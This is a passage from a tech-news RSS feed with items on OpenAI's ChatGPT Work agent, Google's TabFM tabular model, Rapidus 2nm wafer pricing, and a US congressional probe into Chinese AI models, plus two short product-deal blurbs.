href="https://www.reddit.com/r/linux/comments/1usgp9g/got_a_windows_hello_only_usb_fingerprint_reader/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI introduces ChatGPT Work, a cloud-based AI agent that manages tasks across email, Slack and calendars]]></title>
<description><![CDATA[OpenAI on Thursday launched ChatGPT Work, a new AI agent embedded inside its flagship chatbot that aims to transform ChatGPT from a question-and-answer tool into an autonomous work platform capable of executing complex, multi-step tasks across users' email, calendars, code repositories, and messa...]]></description>
<link>https://tsecurity.de/de/3660793/it-nachrichten/openai-introduces-chatgpt-work-a-cloud-based-ai-agent-that-manages-tasks-across-email-slack-and-calendars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660793/it-nachrichten/openai-introduces-chatgpt-work-a-cloud-based-ai-agent-that-manages-tasks-across-email-slack-and-calendars/</guid>
<pubDate>Fri, 10 Jul 2026 22:48:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://openai.com/">OpenAI</a> on Thursday launched <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a>, a new AI agent embedded inside its flagship chatbot that aims to transform ChatGPT from a question-and-answer tool into an autonomous work platform capable of executing complex, multi-step tasks across users' email, calendars, code repositories, and messaging apps.</p><p>The product is powered by OpenAI's latest flagship model, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, and is designed to go far beyond generating text. ChatGPT Work can gather context from connected apps, files, and workflows to produce finished documents, spreadsheets, presentations, reports, and websites. The agent takes a stated outcome, breaks it into smaller steps, and stays with complex projects for hours, completing them independently.</p><p>The launch marks OpenAI's clearest attempt yet to reposition ChatGPT as a workplace platform rather than a chatbot — and it arrives at a moment of extraordinary financial significance for the company. Last month, OpenAI <a href="https://openai.com/index/openai-submits-confidential-s-1/">confidentially submitted a draft S-1 registration statement</a> to the SEC, initiating what could become one of the largest technology IPOs in history, with reported valuations <a href="https://www.cnbc.com/2026/03/31/openai-funding-round-ipo.html">clustering between $730 billion and $852 billion</a> and annualized revenue that has blown past $25 billion.</p><p>In a short demonstration and conversation with VentureBeat on Friday, Ty Geri, a product manager at OpenAI who helped build ChatGPT Work, said the product's mission is to democratize the kind of agentic AI capabilities that OpenAI's internal engineering tool, Codex, has already demonstrated. "What's really exciting is we've seen how much Codex has been able to push the frontier of what we can get done with these AI tools, as opposed to just getting information or answers or guidance," Geri said. "Our internal adoption of Codex is literally an exponential curve across every single product function and every single use case."</p><h2><b>Why OpenAI built a persistent virtual machine that works from the beach</b></h2><p>The core architectural bet behind <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> is a persistent cloud-based virtual machine that runs on OpenAI's servers, always available to the user regardless of which device they happen to be on. That marks a deliberate departure from competitors whose agents require a local machine to remain powered on and connected.</p><p>"What's really exciting about ChatGPT Work is that it's a virtual machine in the cloud that's always on for you, and this is available across all of our paid tiers," Geri said. "All Plus users are getting this. I think that's a very unique aspect of this."</p><p>The mobile-first aspect of the launch is something Geri described as "missing from the market." He pointed to the ability to create a website on a phone and share it with collaborators as a particularly novel capability. "Sites are new in general to Codex. They launched in Codex about a week and a half ago, but now we're launching also in web and mobile. You can create a site on your phone at the beach and share it with your friends," he said.</p><p><a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> will roll out beginning with <a href="https://chatgpt.com/pricing/?utm_source=google&amp;utm_medium=paid_search&amp;utm_campaign=GOOG_C_SEM_GBR_Premium_CHT_BAU_ACQ_PER_MIX_ALL_NAMER_US_EN_081125&amp;c_id=22874197666&amp;c_agid=184333759620&amp;c_crid=778419668389&amp;c_kwid=kwd-1931160859103&amp;c_ims=&amp;c_pms=9061275&amp;c_nw=g&amp;c_dvc=c&amp;gad_source=1&amp;gad_campaignid=22874197666&amp;gbraid=0AAAAA-I0E5eVxMdRuuMlOhjqMjAi2KCBS&amp;gclid=Cj0KCQjwsMLSBhD9ARIsAIpUTDoJ61xQZv3XpwtAkZ20Et-Y9TM9_exet3Bh9O9h2kxVcpfmgHkyx68aAlw-EALw_wcB">Pro, Enterprise, and Edu users</a>, and will expand to Plus and Business users over the next few days. In the interview, Geri emphasized that the availability of the product to Plus subscribers — not just premium tiers — is central to OpenAI's strategy. "It's accessible to all paid plans, including Plus users, which in my opinion is a really big feat, and really part of that OpenAI mission, which is about bringing all this power to as many people," he said.</p><h2><b>How MCP plugins connect ChatGPT Work to Slack, Gmail, and GitHub</b></h2><p>The product relies on MCP-based plugins to connect to external services like Gmail, Google Calendar, Slack, and GitHub. When asked whether the plugin architecture is based on the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol standard</a>, Geri confirmed: "These are all based on MCP." He added that connecting multiple Gmail accounts — a frequent user request — "is definitely on the roadmap."</p><p>The experience is designed to be action-oriented from the first interaction. <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> offers a personalized onboarding flow that surfaces different suggested use cases depending on the user's role. Geri demonstrated how the system, detecting his role as a product manager, immediately suggested tasks like evaluating AI systems, building research artifacts, and managing his calendar. "You can start with a simple task like catch me up on Slack or Teams or read today's calendar," Geri said. He described a scenario where the system reviewed his calendar, identified scheduling conflicts, flagged meetings requiring preparation, and then — on his instruction — declined, accepted, or rescheduled events directly.</p><p>Users can also customize the agent by teaching it their writing style, organizing outputs into projects, and — in a lighter touch — choosing a virtual pet that accompanies them in the interface. The interface also introduces a hosted website feature that allows users to build and share interactive sites directly through ChatGPT Work, turning what would typically be a static slide deck into a dynamic, collaborative artifact. "Now we suddenly have a collaborative interface that's actually more exciting and more accessible than a slide deck, which has all these formatting restrictions," Geri said.</p><h2><b>Scheduling 10 bug bashes at once: what agentic productivity looks like in practice</b></h2><p>Geri's own usage of <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> illustrates the breadth of tasks the system can handle. In the run-up to the product's launch, he needed to organize pre-release testing sessions — known internally as "bug bashes" — across dozens of features and team members.</p><p>"I just come to ChatGPT Work and say, 'Set up a bug bash for all the distinct features in ChatGPT Work. Add all the people that worked on that feature,' and it can check Slack, it can check GitHub, it can check Docs, and find a time that works for the four highest contributors to that feature," Geri said. "It went and scheduled 10 bug bashes, all coordinated across all those different people. That would have taken me 30 minutes at least."</p><p>But Geri pushed back against the characterization that <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> is limited to rote administrative work. He described using it for analytically complex tasks like identifying the biggest causes of user churn for specific product features and generating product solutions — work he said would previously have taken months. "Things that we would have spent three months doing, we can now spend a week doing — and do much more, and make a much better product," Geri said. "Bugs that we would have found three or four weeks from now, we can now find within two days and fix for our users."</p><p>He also described handing off the tedium of product testing itself. "It used to be that even though like the most interesting part of my job is like what to test, I would actually end up having to spend most of my job doing the testing, which is like me taking a mouse and like clicking on the same thing over and over again, like five times," Geri said. "Instead, now I can define what do we want to test, and ChatGPT Work or Codex can actually go test it for me, deliver me that bug report, and then we can work on fixing that bug."</p><h2><b>What OpenAI says about data privacy when AI reads your Slack and email</b></h2><p>When pressed on data privacy concerns — given that ChatGPT Work pulls sensitive information from workplace tools like Slack, Google Drive, and email — Geri said privacy "is incredibly important, and the most important part of this is it's always in the user's control."</p><p>He pointed to OpenAI's existing enterprise security infrastructure, noting that "enterprise accounts have ZDR, and users can always opt out of letting their conversations help improve future models, which many users do." The comment aligns with assurances OpenAI made when it first launched ChatGPT Enterprise in August 2023, when the company wrote in a blog post that it does "<a href="https://openai.com/index/introducing-chatgpt-enterprise/">not train on your business data or conversations</a>."</p><p>The privacy question carries additional weight now because of the sheer volume of sensitive workplace data ChatGPT Work is designed to access. Unlike a chatbot session where a user voluntarily pastes text into a prompt, ChatGPT Work actively reaches into connected systems — reading Slack messages, scanning calendar invitations, pulling GitHub commit histories — to assemble context for its tasks. That represents a fundamentally different data surface area than anything OpenAI has offered before, and one that enterprise security teams will scrutinize carefully before granting access.</p><h2><b>ChatGPT Work enters a three-way arms race with Anthropic and Microsoft</b></h2><p>ChatGPT Work lands squarely in the middle of what has become the defining competitive battlefield in enterprise AI: the race to build autonomous workplace agents that can go beyond generating text and actually execute tasks.</p><p>The product arrives months after Anthropic took <a href="https://claude.com/product/cowork">Claude Cowork</a> out of preview and into general availability in April, bringing its AI agent to web and mobile platforms aimed at helping enterprise users monitor and manage long-running AI-driven tasks from anywhere. Meanwhile, Microsoft made <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/cowork">Copilot Cowork</a> generally available worldwide on June 16, built in partnership with Anthropic to move beyond chat and into execution. The three products — ChatGPT Work, Claude Cowork, and Microsoft Copilot Cowork — now compete directly for the attention of enterprise IT departments and individual knowledge workers alike.</p><p>The convergence is striking. All three products share a remarkably similar vision: a persistent AI agent running in the cloud that can break complex tasks into steps, connect to workplace tools via plugins, and produce finished outputs rather than just conversational replies. All three work across desktop, web, and mobile.</p><p>What distinguishes OpenAI's approach is its raw consumer distribution advantage. ChatGPT has reached <a href="https://openai.com/index/scaling-ai-for-everyone/">900 million weekly active users</a>, and OpenAI now has <a href="https://openai.com/index/scaling-ai-for-everyone/">50 million paying subscribers</a>. More than 9 million paying business users rely on ChatGPT for work, and 92% of Fortune 500 companies now use ChatGPT. By making ChatGPT Work available to Plus subscribers at $20 a month — not just Enterprise or Pro customers — OpenAI is betting that broad accessibility will drive adoption faster than any competitor can match.</p><h2><b>OpenAI's product manager says AI is a partner, not a replacement — with a caveat</b></h2><p>When asked about the potential impact on the labor market, Geri was careful with his framing. He declined to speak broadly about workforce disruption but offered his personal experience as a product manager whose day-to-day work has been substantially reshaped by the tool.</p><p>"My job is not to schedule bug bashes and find out who contributed to a specific feature. That's a task I do in my job, but that's not my job," Geri said. "My job is to make an amazing product." He described ChatGPT Work as "a partner" and "an extension of me, certainly not a replacement," adding: "Everybody feels far more productive than before, but is also almost working harder than before, because you get to work on all the things you want to work on as opposed to the drudgery around it."</p><p>But Geri was also careful not to minimize the sophistication of the work the agent can handle. "I also don't want to say that it's only doing mundane tasks because, like something like hill climbing retention curves on a given feature is not mundane. It's actually really hard to do," he said. The distinction matters. If <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> were merely automating calendar invitations and expense reports, it would be a convenience tool. The fact that Geri describes it compressing three months of analytical product work into a single week suggests something with far greater implications for how teams are structured and staffed.</p><h2><b>An IPO-bound company needs ChatGPT Work to prove enterprise AI can generate revenue</b></h2><p>The timing of ChatGPT Work's launch is impossible to separate from OpenAI's IPO trajectory. The company needs to demonstrate that it can convert its massive consumer user base into durable enterprise revenue — a narrative that becomes significantly more compelling with a product explicitly designed around professional workflows.</p><p>OpenAI said it is generating <a href="https://openai.com/index/accelerating-the-next-phase-ai/">$2 billion in revenue per month</a>, growing four times faster than Alphabet and Meta did at comparable stages, with enterprise now making up more than 40% of revenue and on track to reach parity with consumer by the end of 2026. But OpenAI remains heavily loss-making, and <a href="https://fortune.com/2025/11/26/is-openai-profitable-forecast-data-center-200-billion-shortfall-hsbc/">the company does not expect to reach profitability until around 2030</a>, with internal projections suggesting losses of $14 billion in 2026 alone.</p><p>The competitive dynamics are unprecedented. Anthropic filed for its own IPO on June 1 at a <a href="https://www.reuters.com/business/anthropic-raises-65-billion-now-valued-965-billion-2026-05-28/">$965 billion valuation</a>, setting up simultaneous public listings from the two most prominent AI startups in history. Whether both can sustain their lofty valuations under the scrutiny of public market investors will depend in large part on whether products like ChatGPT Work and Claude Cowork deliver measurable productivity gains to paying enterprise customers.</p><p>The launch also caps a product trajectory that began with <a href="https://chatgpt.com/business/?utm_source=google&amp;utm_medium=paid_search&amp;utm_campaign=GOOG_B_SEM_GBR_Core-Generic_MIX_BAU_ACQ_PER_MIX_ALL_NAMER_US_EN_042826&amp;c_id=23786098075&amp;c_agid=193601180617&amp;c_crid=806361782592&amp;c_kwid=aud-2471394551488:kwd-1933117063409&amp;c_ims=&amp;c_pms=9061275&amp;c_nw=g&amp;c_dvc=c&amp;gad_source=1&amp;gad_campaignid=23786098075&amp;gbraid=0AAAAA-I0E5fOwq9zncww98G13-WJxCPbT&amp;gclid=Cj0KCQjwsMLSBhD9ARIsAIpUTDonc5DPxzLgOO1GFI9yNaazBtf33Yums0oGIg1CR79ZRSiXK0LbcVkaAg9uEALw_wcB">ChatGPT Enterprise</a> in August 2023, accelerated through the release of OpenAI's Operator agent in January 2025, and continued through Operator's deprecation and shutdown on August 31, 2025, when its capabilities were folded into the ChatGPT agent framework. ChatGPT Work is the consolidation of those efforts into a single, unified product — one that pairs <a href="https://openai.com/index/gpt-5-6/">GPT-5.6's three model variants</a> (Sol for power, Luna for speed, and Terra for balanced everyday use) with a persistent cloud environment and an expanding library of MCP plugins.</p><h2><b>The future of work may already be running in the cloud</b></h2><p>When asked whether ChatGPT Work signals a shift toward a new kind of operating system — one where users interact with their computers primarily through an AI agent rather than through traditional mouse-and-keyboard interfaces — Geri stopped short of making sweeping predictions. But he hinted at the direction OpenAI sees ahead.</p><p>"Anybody who has worked with Codex or now ChatGPT Work will realize how exciting it is to interact with your environment and your computer via the agent," he said. "Especially in the desktop app, where the model has access to your entire machine and can interact with websites on your behalf — it's really able to be an extension of you and a real partner, and that certainly feels like the future."</p><p>At the end of the interview, Geri circled back to something personal. "I've never enjoyed work as much as I have in the last month using ChatGPT Work and Codex," he said — a striking admission from a product manager who, until recently, spent a meaningful share of his days clicking through the same interface five times in a row just to see if it would break. OpenAI is now asking 900 million users to believe that feeling scales. For a company weeks away from one of the largest public offerings in history, the answer to that question is worth roughly $850 billion.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google's TabFM skips per-dataset training and still predicts on tables it's never seen]]></title>
<description><![CDATA[The vast majority of business data is tabular — living in data warehouses, CRMs, and financial ledgers — yet building a reliable model from it still means training a new one from scratch for every dataset, then maintaining hyperparameter tuning loops, feature engineering, and retraining pipelines...]]></description>
<link>https://tsecurity.de/de/3660555/it-nachrichten/googles-tabfm-skips-per-dataset-training-and-still-predicts-on-tables-its-never-seen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660555/it-nachrichten/googles-tabfm-skips-per-dataset-training-and-still-predicts-on-tables-its-never-seen/</guid>
<pubDate>Fri, 10 Jul 2026 20:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The vast majority of business data is tabular — living in data warehouses, CRMs, and financial ledgers — yet building a reliable model from it still means training a new one from scratch for every dataset, then maintaining hyperparameter tuning loops, feature engineering, and retraining pipelines to fight data drift. Google Research is proposing a way around that: <a href="https://research.google/blog/introducing-tabfm-a-zero-shot-foundation-model-for-tabular-data/">a new foundation model called TabFM</a> that treats tabular prediction as an in-context learning problem instead.</p><p>It can generate predictions for a new, unseen table in a single forward pass. For enterprise developers and AI engineers, this reduces the time-to-production from weeks of pipeline engineering to a single API call.</p><h2>The challenge with traditional ML</h2><p>To extract reliable predictions from a gradient-boosted tree, data scientists must build and maintain complex data pipelines. They have to clean messy inputs, impute missing values, encode categorical variables into numerical formats, and engineer custom feature crosses.</p><p>Once the data is ready, they must run repetitive hyperparameter optimization loops, searching across learning rates, tree depths, subsampling ratios, and regularization grids to find the best configuration. </p><p>Once deployed, these traditional models "incur ongoing operational debt through data drift monitoring and retraining pipelines to stay accurate," Weihao Kong, Research Scientist at Google Research, told VentureBeat.</p><p>Meanwhile, the rest of the AI industry has moved on. Generative AI models for text and computer vision have seamlessly shifted to zero-shot inference, where a model can perform a completely new task simply by being prompted with context. </p><p>Large language models (LLMs) already excel at <a href="https://venturebeat.com/business/fine-tuning-vs-in-context-learning-new-research-guides-better-llm-customization-for-real-world-tasks">in-context learning</a>, so why can't we just feed tables into an off-the-shelf LLM?</p><p>Because LLMs are trained on natural language rather than structured data, they struggle to process tables directly. First, their context limits are exhausted quickly by medium-sized tables containing just a few thousand rows and hundreds of columns. Second, LLMs suffer from tokenization inefficiency, awkwardly splitting numerical values and destroying mathematical precision. Finally, they suffer from structural blindness. When a 2D table is serialized as a 1D text string, LLMs lose track of which value belongs to which row and column as the table grows. </p><p>"That's why, today, it is far more effective to use an LLM to write the code that handles feature engineering and calls XGBoost than to ask the LLM to read the table itself," Kong said.</p><h2>What is TabFM?</h2><p>To run inference with TabFM, you do not update any model weights. Instead, you take your historical examples (the training rows with their known labels) and your target rows (the new data you want to predict) and pass them to the model as a single, unified prompt. The model learns to interpret the relationships between columns and rows directly from this context at runtime.</p><p>For example, consider an enterprise analyst trying to predict customer churn. Instead of building a bespoke data pipeline and training an XGBoost model, they can simply pass a sample of historical user session data alongside a new, active session into TabFM. In one forward pass, the model returns an instant churn probability. </p><p>TabFM overcomes the limitations of LLMs by treating the data as a grid, preserving its structural integrity without forcing it into a single-dimensional text string.</p><p>To effectively process diverse tabular structures while enabling scalable zero-shot prediction, TabFM synthesizes the strengths of earlier experimental architectures, TabPFN and TabICL. <a href="https://github.com/PriorLabs/tabpfn">TabPFN</a>, developed by Prior Labs, first proved that a transformer architecture could perform zero-shot classification on small tables, though it struggled to scale computationally to larger datasets. </p><p>Later, <a href="https://dl.acm.org/doi/10.5555/3780338.3782366">TabICL</a>, developed by France's National Research Institute for Digital Science and Technology, addressed this bottleneck by introducing row compression, allowing in-context learning to efficiently process much larger tables. </p><p>TabFM combines TabPFN's deep feature contextualization with TabICL's efficient compression into a novel hybrid design built on three key mechanisms:</p><p><b>1. Alternating row and column attention:</b> The raw table is first processed through a multilayer attention module that alternates across both columns (features) and rows (examples). By continuously attending across these two dimensions, the model natively captures complex feature interactions. This deep contextualization does the heavy lifting that would usually require tedious manual feature crafting by data scientists.</p><p><b>2. Row compression:</b> Following this contextualization, the cross-attended information for each row is compressed into a single, dense vector representation. TabICL pioneered this by using CLS tokens to compress a row's rich information into one vector, "in contrast to TabPFN v2, v2.5, and v2.6, which attend over the full cell grid throughout the network," Kong explained. This drastically shrinks the computational footprint.</p><p><b>3. In-context learning (ICL):</b> A causal Transformer then operates on this sequence of compressed embeddings. This Transformer model uses the attention mechanism of TabICL to attend over these dense row vectors, drastically reducing the computation cost and allowing the model to process large datasets efficiently.</p><p>A major selling point of TabFM is its pretraining recipe. The model was trained entirely on hundreds of millions of synthetic datasets. These datasets were dynamically generated using structural causal models (SCMs) that incorporate a wide variety of random functions. By training exclusively on synthetic SCMs, TabFM learned the fundamental mathematical priors of how tabular features interact without ingesting real-world, confidential CSV files.</p><h2>TabFM in action</h2><p>To test the model's capabilities, Google researchers benchmarked TabFM on TabArena, a comprehensive evaluation suite spanning 51 diverse tabular datasets across 38 classification and 13 regression tasks.</p><p>On these public benchmarks, TabFM's zero-shot predictions already match or beat heavily tuned supervised baselines. However, Google is careful to note that this does not automatically mean TabFM will universally dethrone bespoke, hyper-optimized production models on every enterprise workload.</p><p>"Instead of replacing hyper-optimized production models, the true practical business value it unlocks for lean engineering teams is velocity," Kong said. "It allows data analysts and backend engineers to instantly spin up high-quality baseline models without a dedicated data science team managing a complex lifecycle."</p><p>For advanced practitioners looking to squeeze out maximum accuracy, the research team also introduced a "TabFM-Ensemble" configuration. By running the model through 32 distinct variations and blending the results, TabFM pushes the performance even further. </p><h2>Getting started, trade-offs, and the cloud future</h2><p>The shift to in-context learning for tables introduces a new economic trade-off that engineering teams must consider. </p><p>With traditional algorithms, training is slow and expensive, but inference is lightning-fast and cheap. TabFM flips this dynamic. While training time drops to zero, inference becomes significantly heavier. Because the model must process the entire historical dataset as context during every single prediction, it requires more compute and memory at runtime. </p><p>In this new paradigm, "traditional machine learning training becomes the 'prefill' phase (KV caching) in the context window," Kong said. While this prefill cost is steep, it is paid only once per table, and the cache is reused across subsequent queries. "The catch is prediction latency, which no amount of caching removes," Kong added. Every new prediction requires a pass through a large transformer. "Any production API requiring single-digit-millisecond response times cannot tolerate TabFM's forward-pass overhead."</p><p>For developers looking to evaluate the model today, the barrier to entry is low. Google designed TabFM as a drop-in replacement for traditional ML workflows, offering a scikit-learn compatible API (TabFMClassifier and TabFMRegressor). It natively handles mixed numerical and categorical columns, works directly with pandas DataFrames, and requires no manual ordinal encoders or numerical scalers. The library supports both JAX and PyTorch backends.</p><p>However, enterprise teams need to be aware of current limitations and licensing restrictions. The model architecture has a hard limit of 10 output classes for classification tasks, and it is optimized for tables with up to 500 features. More importantly, while Google released the <a href="https://github.com/google-research/tabfm">underlying codebase</a> under the permissive Apache 2.0 license, the pre-trained model weights are published on <a href="https://huggingface.co/google/tabfm-1.0.0-pytorch">Hugging Face</a> under a strict tabfm-non-commercial-v1.0 license. Developers can evaluate the model internally, but it cannot be deployed in commercial products yet.</p><p>Looking ahead, Google is addressing the commercial deployment friction through its cloud ecosystem. TabFM is being integrated directly into Google BigQuery, allowing analysts to run zero-shot predictions natively via an “AI.PREDICT” command. By putting foundation model inference right next to the data warehouse, TabFM could soon make complex tabular machine learning as accessible as a basic database query.</p><p>In practice, TabFM shines in rapid prototyping, high data drift environments, and small to medium-sized datasets under 100,000 rows. Conversely, teams should stick to traditional models for strict, ultra-low latency APIs, or massive tables exceeding one million rows, which currently require aggressive row sampling that degrades the foundation model's competitive advantage.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Japanese Chipmaker Rapidus Plans Cheap 2nm Wafers To Rival TSMC]]></title>
<description><![CDATA[A new player in the semiconductor space is looking to shake up the global market with some very aggressive pricing. Rapidus, a massive chip manufacturing startup based in Japan, just announced its plan to significantly undercut TSMC when it begins producing advanced silicon. The company wants to ...]]></description>
<link>https://tsecurity.de/de/3660032/ios-mac-os/japanese-chipmaker-rapidus-plans-cheap-2nm-wafers-to-rival-tsmc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660032/ios-mac-os/japanese-chipmaker-rapidus-plans-cheap-2nm-wafers-to-rival-tsmc/</guid>
<pubDate>Fri, 10 Jul 2026 16:37:24 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new player in the semiconductor space is looking to shake up the global market with some very aggressive pricing. Rapidus, a massive chip manufacturing startup based in Japan, just announced its plan to significantly undercut TSMC when it begins producing advanced silicon. The company wants to offer its upcoming two-nanometer wafers for a much lower cost than the current industry leaders, hoping to win over major hardware clients by the end of the decade.



The startup will price its new wafers at around 20,000 dollars



The chief executive of the Japanese startup recently confirmed that the company plans to charge between three million and three and a half million yen per wafer. Depending on exchange rates, that puts the cost of its two-nanometer-class manufacturing right around $20,000. This pricing strategy directly targets TSMC, which is rumored to charge roughly $30,000 for its own two-nanometer nodes.



While the exact final prices will naturally fluctuate, the startup clearly wants to use cost as its main weapon. Offering these advanced chips at a huge discount could tempt big tech companies to move their orders away from Taiwan and over to Japan. Samsung is also expected to price its competing silicon around the $20,000 mark, meaning a massive price war is brewing in the semiconductor industry.



Mass production of the advanced chips will begin in late 2027



Getting a brand new chip factory running at full speed takes a lot of time. Rapidus plans to kick off high-volume manufacturing during the second half of 2027. However, the company probably will not pump out meaningful, large-scale volumes until sometime in 2028. This slight delay means they will enter the market just as TSMC moves on to even more advanced technologies.



Even with the timeline challenge, the startup has massive backing to ensure it survives the difficult ramp-up period. The Japanese government heavily subsidizes the project as part of a national goal to boost domestic chip production. If Rapidus can actually deliver reliable two-nanometer chips at these lower prices, it could completely reshape how the biggest tech brands source the brains for their future devices.



With billions of dollars in government backing and an aggressive pricing strategy, this new manufacturer is refusing to play it safe. By forcing established giants to rethink their high costs, the entire tech industry might soon benefit from a much more competitive chip market.]]></content:encoded>
</item>
<item>
<title><![CDATA[This £30 massage gun is the cheap and reliable option I needed to relax tight and achy muscles after bouldering]]></title>
<description><![CDATA[Cheap massage guns are all over Amazon, but this £30 option from Renpho has been a quality and reliable option to give me some post-workout relief.]]></description>
<link>https://tsecurity.de/de/3659693/it-nachrichten/this-30-massage-gun-is-the-cheap-and-reliable-option-i-needed-to-relax-tight-and-achy-muscles-after-bouldering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659693/it-nachrichten/this-30-massage-gun-is-the-cheap-and-reliable-option-i-needed-to-relax-tight-and-achy-muscles-after-bouldering/</guid>
<pubDate>Fri, 10 Jul 2026 14:33:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cheap massage guns are all over Amazon, but this £30 option from Renpho has been a quality and reliable option to give me some post-workout relief.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mint Mobile's epic Galaxy S26 deal is back in stock — get $500 off any device in the range, plus a full year of unlimited data for cheap]]></title>
<description><![CDATA[Mint Mobile's popular Galaxy S26 series deal quickly sold out last time it was in stock — but now it's back again if you're quick.]]></description>
<link>https://tsecurity.de/de/3659583/it-nachrichten/mint-mobiles-epic-galaxy-s26-deal-is-back-in-stock-get-500-off-any-device-in-the-range-plus-a-full-year-of-unlimited-data-for-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659583/it-nachrichten/mint-mobiles-epic-galaxy-s26-deal-is-back-in-stock-get-500-off-any-device-in-the-range-plus-a-full-year-of-unlimited-data-for-cheap/</guid>
<pubDate>Fri, 10 Jul 2026 13:47:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mint Mobile's popular Galaxy S26 series deal quickly sold out last time it was in stock — but now it's back again if you're quick.]]></content:encoded>
</item>
<item>
<title><![CDATA[Lawmakers Probe Growing Use of Chinese AI Models In US Companies]]></title>
<description><![CDATA[U.S. lawmakers are probing the growing use of Chinese AI models by American companies, citing concerns over censorship, security risks, and whether U.S. firms are turning to cheaper foreign models because domestic alternatives are too costly or restricted. The investigation is specifically lookin...]]></description>
<link>https://tsecurity.de/de/3658389/it-security-nachrichten/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658389/it-security-nachrichten/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies/</guid>
<pubDate>Fri, 10 Jul 2026 01:07:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. lawmakers are probing the growing use of Chinese AI models by American companies, citing concerns over censorship, security risks, and whether U.S. firms are turning to cheaper foreign models because domestic alternatives are too costly or restricted. The investigation is specifically looking at companies such as Cursor and Airbnb. "The growing use of Chinese AI models by U.S. companies raises serious concerns," a State Department spokesperson told CNBC. Those "AI models are designed to advance Beijing's narratives, censor dissent, and reflect CCP ideology and values." CNBC reports: The House Committee on Homeland Security and the House Select Committee on China said in April they will jointly investigate the growing adoption of Chinese-developed AI models. An initial step in the probe was for the chairmen of those committees to send letters to Cursor and Airbnb, over their "use of or exposure to these risks" through AI developed in China. "The Chinese Communist Party is no longer just nipping at our heels in artificial intelligence; it is racing to close the gap in some of the exact capabilities that will shape the future of cybersecurity," Andrew Garbarino, chairman of the U.S. House Committee on Homeland Security, told CNBC. "Recent reporting that a Chinese open-weight model can match leading U.S. models in certain vulnerability discovery and cybersecurity tasks is highly alarming," said Garbarino.
 
While some government departments have banned the usage of Chinese AI models including DeepSeek, adoption of them by U.S. companies is not prohibited. Tech chiefs, including crypto company Coinbase's Brian Armstrong and AI startup Lindy's Flo Crivello, have been publicly touting the use of models from China to reduce costs. Cursor, which will be acquired by Elon Musk's SpaceX for $60 billion, built its Composer 2 model using Chinese AI model Kimi, which was developed by Moonshot AI. Alongside focusing on the rise of Chinese AI models, the ongoing joint House Committees' investigation is also looking into whether the U.S. is doing enough to tackle their rise. "The Committees are also examining whether the United States has a sufficient open-weight AI strategy to ensure American companies and cyber defenders are not forced to choose between expensive or restricted U.S. models and cheap, capable PRC-developed alternatives," a Committee aide, who asked not to be named as they were not authorized to discuss the ongoing probe, told CNBC.
 
[...] The administration could consider the use of federal procurement bans, which would include restricting government agencies and private companies that serve the U.S. government from using Chinese AI models, Kyle Chan, fellow in the John L. Thornton China Center at think tank Brookings, told CNBC. "However, it's ultimately impossible to ban China's open-source AI models because their model weights are available freely on the internet," Chan added. "This could enter into first amendment speech issues." [...] Another [approach] could be disseminating findings about risks and vulnerabilities associated with Chinese AI models to U.S. companies. "Regardless, I do expect both the Executive Branch and Congress to communicate their interest not to see U.S. companies adopting these models," [said Daniel Remler, senior fellow, technology and national security program at think tank the Center for a New American Security (CNAS), told CNBC].<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Lawmakers+Probe+Growing+Use+of+Chinese+AI+Models+In+US+Companies+%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F1947218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F09%2F1947218%2Flawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/09/1947218/lawmakers-probe-growing-use-of-chinese-ai-models-in-us-companies?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprises using multiple AI models are underestimating failure rates by 2.25x]]></title>
